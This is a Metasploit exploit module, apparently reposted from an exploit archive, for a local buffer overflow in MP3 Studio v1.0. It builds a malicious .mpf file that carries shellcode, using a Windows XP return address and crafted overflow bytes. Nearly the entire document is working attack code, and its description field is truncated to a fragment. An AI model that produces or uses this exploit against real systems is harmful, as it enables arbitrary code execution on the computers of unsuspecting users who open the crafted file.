MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH) Meta
Source: vfocus.net  Author: effects  Published: 2010-06-04
#####################################################################  
# Title: MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH) Meta
# CVE-ID: () 
# OSVDB-ID: () 
# Author: sid3^effects
# Published: 2010-06-03
#####################################################################


## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking

    include Msf::Exploit::FILEFORMAT

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH) META',
            'Description'    => %q{


                    to execute arbitrary code.
            },
            'License'        => MSF_LICENSE,
            'Author'         => [ 'sid3^effects aKa HaRi' ],
            'Version'        => 'Version 1.0',
            'References'     =>
                [
                    [ 'URL', 'http://www.exploit-db.com/exploits/9291' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'seh',
                },
            'Payload'        =>
                {
                    'Space'    => 986,
                    'BadChars' => "\x00\x1a\x0a\x0d",
                    'StackAdjustment' => -3500,
                },
            'Platform' => 'win',
            'Targets'        =>
                [
                    [ 'Windows XP Universal', { 'Ret' => 0x7c96bf33 } ], # JMP ESP in ULMigration_us.dll
                ],
            'Privileged'     => false,
            'DefaultTarget'  => 0))

        register_options(
            [
                OptString.new('FILENAME',   [ false, 'The file name.', 'msf.mpf']),
            ], self.class)

    end

    def exploit

        sploit =  "\x3f\x5e\x03\x10"
        sploit << "\xeb\xf1\x90\x90"
        sploit << "\xfd\x61\x03\x10"
        sploit << rand_text_alpha_upper(4103)
        sploit << [target.ret].pack('V')
        sploit << make_nops(10)
        sploit << payload.encoded
        sploit << "\x33\xc0\x33\x45\xf8\x04\x05\xff\xe0"

        mpf = sploit

        print_status("Creating '#{datastore['FILENAME']}' file ...")

        file_create(mpf)

    end

end


 